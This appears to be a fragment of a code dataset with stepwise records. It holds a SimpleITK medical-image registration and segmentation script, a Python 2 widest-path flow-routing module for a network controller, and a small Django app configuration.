"step-5": "import SimpleITK as sitk\r\nimport numpy as np\r\nfrom sklearn.ensemble import RandomForestClassifier\r\n\r\n\r\n# # Estimation function # #\r\n# --------------------------- #\r\n# Linear registration function\r\n# --------------------------- #\r\n\r\n# --- Input --- #\r\n# im_ref : The common image [numpy.ndarray]\r\n# im_mov : The group image [numpy.ndarray]\r\n# mov_mask : List of GROUP masks [list]\r\n# show_parameters : If you want to see the parameters, false by default [boolean]\r\n\r\n\r\n# --- Output --- #\r\n# lin_xfm : Estimated transformation parameters [itk.simple.Transform]\r\n\r\ndef est_lin_transf(im_ref, im_mov, mov_mask=None, show_parameters=False):\r\n initial_transform = sitk.CenteredTransformInitializer(im_ref, im_mov, sitk.ScaleSkewVersor3DTransform(),\r\n sitk.CenteredTransformInitializerFilter.MOMENTS)\r\n\r\n # Initialize registration\r\n lin_transformation = sitk.ImageRegistrationMethod()\r\n\r\n # Set metrics\r\n lin_transformation.SetMetricAsMeanSquares()\r\n lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)\r\n lin_transformation.SetMetricSamplingPercentage(0.01)\r\n\r\n # Set mask\r\n if mov_mask:\r\n lin_transformation.SetMetricMovingMask(mov_mask)\r\n\r\n # Gradient Descent optimizer\r\n lin_transformation.SetOptimizerAsGradientDescent(learningRate=1, numberOfIterations=400,\r\n convergenceMinimumValue=1e-6, convergenceWindowSize=10)\r\n lin_transformation.SetOptimizerScalesFromPhysicalShift()\r\n\r\n # Set the initial transformation\r\n lin_transformation.SetInitialTransform(initial_transform)\r\n\r\n # Switching to preferred variable\r\n lin_xfm = lin_transformation\r\n\r\n if show_parameters:\r\n print(lin_xfm)\r\n\r\n return lin_xfm\r\n\r\n\r\n# # Estimation function # #\r\n# --------------------------- #\r\n# Non-linear 'Demons' registration function\r\n# --------------------------- #\r\n\r\n# --- Input --- #\r\n# im_ref : The common image [numpy.ndarray]\r\n# fixed_mask : The mask of common image, default is None [numpy.ndarray]\r\n# show_parameters : If you want to see the parameters, false by default [boolean]\r\n\r\n\r\n# --- Output --- #\r\n# nl_xfm : Estimated transformation parameters [itk.simple.Transform]\r\n\r\ndef est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):\r\n # Initialize the registration\r\n reg_method = sitk.ImageRegistrationMethod()\r\n\r\n # Create initial identity transformation.\r\n transform_to_displacement_field_filter = sitk.TransformToDisplacementFieldFilter()\r\n transform_to_displacement_field_filter.SetReferenceImage(im_ref)\r\n initial_transform = sitk.DisplacementFieldTransform(\r\n transform_to_displacement_field_filter.Execute(sitk.Transform()))\r\n\r\n # Regularization. 
The update field refers to fluid regularization; the total field to elastic regularization.\r\n initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0, varianceForTotalField=1.5)\r\n\r\n # Set the initial transformation\r\n reg_method.SetInitialTransform(initial_transform)\r\n\r\n # Set Demons registration\r\n reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)\r\n\r\n # Evaluate the metrics only in the mask\r\n if fixed_mask is not None:\r\n reg_method.SetMetricFixedMask(fixed_mask)\r\n\r\n # Set a linear interpolator\r\n reg_method.SetInterpolator(sitk.sitkLinear)\r\n\r\n # Set a gradient descent optimizer\r\n reg_method.SetOptimizerAsGradientDescent(learningRate=1.0, numberOfIterations=10, convergenceMinimumValue=1e-6,\r\n convergenceWindowSize=10)\r\n reg_method.SetOptimizerScalesFromPhysicalShift()\r\n\r\n # Switching to the preferred variable\r\n nl_xfm = reg_method\r\n\r\n if show_parameters:\r\n print(nl_xfm)\r\n\r\n return nl_xfm\r\n\r\n# # Application function # #\r\n# --------------------------- #\r\n# Executes either the linear or the non-linear function\r\n# --------------------------- #\r\n\r\n# --- Input --- #\r\n# im_ref : The common image [numpy.ndarray]\r\n# im_mov : The group image [numpy.ndarray]\r\n# trafo : The chosen transformation [numpy.ndarray]\r\n# show_parameters : If you want to see the parameters, false by default [boolean]\r\n\r\n\r\n# --- Output --- #\r\n# final_image : Returns the registered image [numpy.ndarray]\r\n\r\ndef apply_transf(im_ref, im_mov, trafo, show_parameters=False):\r\n # Perform registration (Executes it)\r\n transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(im_mov, sitk.sitkFloat32))\r\n\r\n if show_parameters:\r\n print(transf)\r\n print(\"--------\")\r\n print(\"Optimizer stop condition: {0}\".format(trafo.GetOptimizerStopConditionDescription()))\r\n print(\"Number of iterations: {0}\".format(trafo.GetOptimizerIteration()))\r\n print(\"--------\")\r\n\r\n return transf\r\n\r\n\r\n# # Atlas segmentation function # #\r\n# --------------------------- #\r\n# Atlas-based segmentation using the CT images in 'ct_list'\r\n# and corresponding segmentation masks from 'seg_list'.\r\n# After that, majority voting to return a segmentation mask.\r\n# --------------------------- #\r\n\r\n# --- Input --- #\r\n# common_img : The chosen COMMON image [sitk-image]\r\n# ct_list : List of GROUP images [list]\r\n# seg_list : List of GROUP masks [list]\r\n\r\n# --- Output --- #\r\n# segmented_array : The segmentation as an array [numpy.ndarray]\r\n\r\ndef seg_atlas(common_img, ct_list, seg_list):\r\n # Creating the necessary lists\r\n seg = []\r\n image_list = []\r\n\r\n # # REGISTRATION # #\r\n for i in range(len(ct_list)):\r\n # Adjusting the settings and applying\r\n trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=seg_list[i], show_parameters=False)\r\n final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)\r\n\r\n # Perform registration on mask image\r\n resampler = sitk.ResampleImageFilter()\r\n resampler.SetReferenceImage(common_img)\r\n resampler.SetInterpolator(sitk.sitkLinear)\r\n\r\n resampler.SetTransform(final_trafo)\r\n resampled_mask = resampler.Execute(seg_list[i])\r\n\r\n resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)\r\n seg.append(resampled_mask_data)\r\n\r\n # # MAJORITY VOTING # #\r\n for i in range(len(seg)):\r\n for j in range(i + 1, len(seg)):\r\n arr1 = np.transpose(np.nonzero(seg[i]))\r\n arr2 = np.transpose(np.nonzero(seg[j]))\r\n\r\n # 
Filling two lists\r\n arr1list = [tuple(e) for e in arr1.tolist()]\r\n arr2list = [tuple(e) for e in arr2.tolist()]\r\n\r\n # Sorting both lists\r\n arr1list.sort()\r\n arr2list.sort()\r\n\r\n # Creating necessary list & sorting\r\n intersections = list(set(arr1list).intersection(arr2list))\r\n intersections.sort()\r\n\r\n image_list.append(intersections)\r\n # Creating a list which contains the indexes of intersecting voxels\r\n intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(image_list[2]))\r\n\r\n # Sorting the list\r\n intersection_list.sort()\r\n\r\n # Fetches array from image\r\n image_array = sitk.GetArrayFromImage(common_img)\r\n\r\n # Creates an array for the points and fills it using indexes\r\n segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)\r\n for x, y, z in intersection_list:\r\n segmented_array[x, y, z] = 1\r\n\r\n return segmented_array\r\n\r\n\r\n# # Similarity function # #\r\n# --------------------------- #\r\n# Calculates the following distances between images:\r\n# 1. Jaccard coef.\r\n# 2. Dice coef.\r\n# 3. Hausdorff distance\r\n# --------------------------- #\r\n\r\n# --- Input --- #\r\n# mask_img : The mask image [sikt-image]\r\n# seg_img: The segmented image [sikt-image]\r\n\r\n# --- Output --- #\r\n# None\r\n\r\ndef distances(mask_img, seg_img):\r\n # Creating the necessary filters\r\n hausdorff = sitk.HausdorffDistanceImageFilter()\r\n overlap = sitk.LabelOverlapMeasuresImageFilter()\r\n\r\n # Execute filters\r\n hausdorff.Execute(mask_img, seg_img)\r\n overlap.Execute(mask_img, seg_img)\r\n\r\n # Fetching the distances and appending to distance list\r\n # Jaccard coef.\r\n jaccard = overlap.GetJaccardCoefficient()\r\n\r\n # Dice coef.\r\n dice = overlap.GetDiceCoefficient()\r\n\r\n # Hausdorff distance\r\n hausdorff_distance = hausdorff.GetHausdorffDistance()\r\n\r\n # Printing out the distances for user\r\n print('The Hausdorff distance: {}'.format(\r\n hausdorff_distance))\r\n print('The Dice coefficient: {}'.format(dice))\r\n print('The Jaccard coefficient: {}'.format(jaccard))\r\n\r\n return None\r\n\r\n\r\n# # Classifier Function # #\r\n# --------------------------- #\r\n# Trains a random forest classifier by reading 2d images and comparing\r\n# them to a vector which has labels that correspond to if it contains\r\n# the pubic symphysis. 
The labels are binary.\r\n# --------------------------- #\r\n\r\n# --- Input --- #\r\n# slice_list : List of 2D slice images [list]\r\n# vector_list : List of vectors with binary labels [list]\r\n\r\n# --- Output --- #\r\n# trained_forest : Trained random forest classifier [sklearn.ensemble.forest.RandomForestClassifier]\r\n\r\ndef train_classifier(slice_list, vector_list):\r\n # Creating necessary list\r\n x_train_list = []\r\n\r\n # Reading in input data\r\n for image in slice_list:\r\n\r\n # Fetching arrays\r\n image_array = sitk.GetArrayFromImage(image)\r\n\r\n # Resizing\r\n image_array.resize((512, 512, 512))\r\n\r\n for z in range(image_array.shape[2]):\r\n x_train_list.append(image_array[:, :, z].flatten())\r\n x_train = np.asarray(x_train_list, dtype=np.uint8)\r\n\r\n # Reading in training labels\r\n y_train = None\r\n for i in range(0, len(vector_list)):\r\n if i == 0:\r\n y_train = vector_list[i]\r\n else:\r\n y_train = np.concatenate([y_train, vector_list[i]])\r\n\r\n # Train classifier\r\n trained_forest = RandomForestClassifier(n_estimators=150)\r\n trained_forest.fit(x_train, y_train)\r\n\r\n return trained_forest\r\n\r\n\r\n# # Classifier Function # #\r\n# --------------------------- #\r\n# Utilizes a trained random forest classifier by reading CT image and prints\r\n# which slice has the highest probability of containing the pubic symphysis.\r\n# --------------------------- #\r\n\r\n# --- Input --- #\r\n# ct_image : List of 2D axial slice images [list]\r\n# classifier : Trained random forest classifier [sklearn.ensemble.forest.RandomForestClassifier]\r\n\r\n# --- Output --- #\r\n# None\r\n\r\ndef slice_probability(ct_image, classifier):\r\n # Creating necessary lists\r\n test_list = []\r\n max_list = []\r\n\r\n # Convert image to numpy array & resize\r\n im_array = sitk.GetArrayFromImage(ct_image)\r\n im_array.resize((512, 512, 512))\r\n\r\n for z in range(im_array.shape[2]):\r\n test_list.append(im_array[:, :, z].flatten())\r\n test_array = np.asarray(test_list, dtype=np.uint8)\r\n\r\n # Predict probabilities for each slice\r\n probabilities = classifier.predict_proba(test_array)\r\n\r\n # Fetching array with maximum probabilities\r\n max = np.amax(probabilities, axis=0)[1]\r\n\r\n for i, prob in enumerate(probabilities):\r\n if prob[1] == max:\r\n max_list.append(i)\r\n\r\n # Print result to user\r\n if len(max_list) == 1:\r\n print(\"Slice {} has highest probability which is: {}\".format(max_list[0], max))\r\n else:\r\n print(\"Slices {} have the highest probability which is: {}\".format(max_list, max))\r\n\r\n return None\r\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
from pulp import *
from collections import namedtuple
import networkx as nx
import itertools
from mcfpox.controller.lib import Flow, Hop
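# NB: this module is Python 2 code (print statements, itertools.izip) and
# uses the networkx 1.x attribute API (G.node / G.edge), consistent with
# the POX-based mcfpox controller it imports from.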
def get_host_from_ip(G, ip):
return next((i for i in G.nodes() if G.node[i].get('ip') == str(ip)), None)
# https://docs.python.org/2/library/itertools.html#recipes
def pairwise(iterable):
"s -> (s0,s1), (s1,s2), (s2, s3), ..."
a, b = itertools.tee(iterable)
next(b, None)
return itertools.izip(a, b)
def widest_path(G, src, dst):
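    # Dijkstra-style widest (maximum-bottleneck) path search.
    # B[x][y] tracks the best known bottleneck capacity from x to y and
    # P[n] the node sequence realising it (src itself is excluded).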
S = set([src])
T = set([n for n in G.nodes() if n != src])
    print S, T  # debug: initial visited / unvisited node sets
N = G.nodes()
B = {}
for n in N:
b = {}
for k in N:
if k == n:
continue
try:
b[k] = G.edge[n][k]['capacity']
except KeyError:
b[k] = 0
B[n] = b
P = {n:[] for n in N}
    while True:
        # Greedy step: among edges leaving the visited set S, pick the
        # unvisited node k reachable with the widest bottleneck so far.
        k = None
        highest = 0
        for n in S:
            for m in G[n]:
                if m in S:
                    continue
                # The bottleneck through n is capped by the best known
                # bottleneck to n itself (the source has no such cap).
                cap = G.edge[n][m]['capacity']
                if n != src:
                    cap = min(cap, B[src][n])
                if cap > B[src][m]:
                    B[src][m] = cap
                if cap > highest:
                    k = m
                    highest = cap
                    P[k] = P[n] + [k]
        if k is None:
            break  # nothing else is reachable; dst may be disconnected
        S.add(k)
        T.remove(k)
        if not T:
            break
        # Relaxation: see whether routing through the newly finalised
        # node k widens the bottleneck to any remaining node.
for n in T:
old = B[src][n]
new = min(B[src][k], B[k][n])
B[src][n] = max(old, new)
if new > old:
P[n] = P[k] + [n]
return P[dst]
def objective(graph, flows):
""" Return a list of paths through the graph for each flow.
Args:
graph:
            An nx.Graph, annotated with network information including
IP addresses for hosts and port numbers for each link.
flows:
A list of mcfpox.controller.lib.Flow objects representing
5-tuples of flows to route through the network
Returns:
A dict mapping each flow in flows to a valid path through the graph.
The path is expressed as a list of mcfpox.controller.lib.Hop objects.
If no valid path can be found, the value for that entry is None.
"""
G = graph.copy()
rules = {}
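    # Route the largest flows first: each placed flow reserves capacity
    # along its hops, so later (smaller) flows see residual capacities.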
flows.sort(key=lambda a: a[1], reverse=True)
for flow,demand in flows:
src = get_host_from_ip(G, flow.nw_src)
dst = get_host_from_ip(G, flow.nw_dst)
if not (src and dst):
continue
if not (src in G.nodes() and dst in G.nodes()):
continue
path = widest_path(G, src, dst)
hops = []
        for a, b in pairwise(path):
            hops.append(Hop(dpid=int(a[1:]), port=G.edge[a][b]['port']))
            # G is an undirected nx.Graph, so G.edge[a][b] and G.edge[b][a]
            # are the same attribute dict; decrementing both would subtract
            # the demand twice. Reserve the shared capacity once.
            G.edge[a][b]['capacity'] -= demand
rules[flow] = hops
return rules
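# --- Hypothetical usage sketch (not part of the original module) ---
# Builds a toy host/switch topology in the networkx 1.x style assumed
# above and routes a single flow through it. The Flow field names used
# here (nw_proto, nw_src, nw_dst, tp_src, tp_dst) are an assumption
# about mcfpox.controller.lib.Flow; adjust to the real namedtuple.
if __name__ == '__main__':
    g = nx.Graph()
    g.add_node('h1', ip='10.0.0.1')
    g.add_node('h2', ip='10.0.0.2')
    g.add_node('s1')
    g.add_node('s2')
    g.add_edge('h1', 's1', capacity=10, port=1)
    g.add_edge('s1', 's2', capacity=5, port=2)
    g.add_edge('s2', 'h2', capacity=10, port=3)
    f = Flow(nw_proto=6, nw_src='10.0.0.1', nw_dst='10.0.0.2',
             tp_src=5000, tp_dst=80)
    # Expect hops via s1 (dpid 1) and s2 (dpid 2) on the listed ports.
    print objective(g, [(f, 2.0)])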
|
normal
|
{
"blob_id": "65bcb4a2fbc05ee19c8a94811d369562ec5e72ff",
"index": 9261,
"step-1": "from pulp import *\nfrom collections import namedtuple\nimport networkx as nx\nimport itertools\nfrom mcfpox.controller.lib import Flow, Hop\n\n\ndef get_host_from_ip(G, ip):\n return next((i for i in G.nodes() if G.node[i].get('ip') == str(ip)), None)\n\n\n# https://docs.python.org/2/library/itertools.html#recipes\ndef pairwise(iterable):\n \"s -> (s0,s1), (s1,s2), (s2, s3), ...\"\n a, b = itertools.tee(iterable)\n next(b, None)\n return itertools.izip(a, b)\n\n\ndef widest_path(G, src, dst):\n S = set([src])\n T = set([n for n in G.nodes() if n != src])\n print S, T\n\n N = G.nodes()\n B = {}\n for n in N:\n b = {}\n for k in N:\n if k == n:\n continue\n try:\n b[k] = G.edge[n][k]['capacity']\n except KeyError:\n b[k] = 0\n B[n] = b\n P = {n:[] for n in N}\n\n while True:\n k = None\n highest = 0\n neighbors = set([])\n\n for n in S:\n for m in G[n]:\n if m in S:\n continue\n B[src][m] = G.edge[n][m]['capacity']\n if B[src][m] > highest:\n k = m\n highest = B[src][m]\n P[k] = P[n] + [k]\n\n S.add(k)\n T.remove(k)\n if not T:\n break\n\n for n in T:\n old = B[src][n]\n new = min(B[src][k], B[k][n])\n B[src][n] = max(old, new)\n if new > old:\n P[n] = P[k] + [n]\n\n return P[dst]\n\n\ndef objective(graph, flows):\n \"\"\" Return a list of paths through the graph for each flow.\n\n Args:\n graph: \n A nx.Graph, annotated with network information including\n IP addresses for hosts and port numbers for each link.\n flows: \n A list of mcfpox.controller.lib.Flow objects representing\n 5-tuples of flows to route through the network\n\n Returns:\n A dict mapping each flow in flows to a valid path through the graph.\n The path is expressed as a list of mcfpox.controller.lib.Hop objects.\n If no valid path can be found, the value for that entry is None.\n \"\"\"\n\n G = graph.copy()\n rules = {}\n flows.sort(key=lambda a: a[1], reverse=True)\n\n for flow,demand in flows:\n src = get_host_from_ip(G, flow.nw_src)\n dst = get_host_from_ip(G, flow.nw_dst)\n\n if not (src and dst):\n continue\n if not (src in G.nodes() and dst in G.nodes()):\n continue\n\n path = widest_path(G, src, dst)\n\n hops = []\n for a,b in pairwise(path):\n hops.append(Hop(dpid=int(a[1:]), port=G.edge[a][b]['port']))\n G.edge[a][b]['capacity'] -= demand\n G.edge[b][a]['capacity'] -= demand\n\n rules[flow] = hops\n\n return rules\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from django.apps import AppConfig
class PersianConfig(AppConfig):
name = 'persian'
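# Hypothetical usage note (assumed package layout): with the app package
# named "persian", this config would typically be activated from the
# project's settings module:
#     INSTALLED_APPS = [
#         # ...
#         'persian.apps.PersianConfig',
#     ]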
|
normal
|
{
"blob_id": "6b0d1de4c77841f20670331db3332cf87be7ad84",
"index": 3931,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass PersianConfig(AppConfig):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass PersianConfig(AppConfig):\n name = 'persian'\n",
"step-4": "from django.apps import AppConfig\n\n\nclass PersianConfig(AppConfig):\n name = 'persian'\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |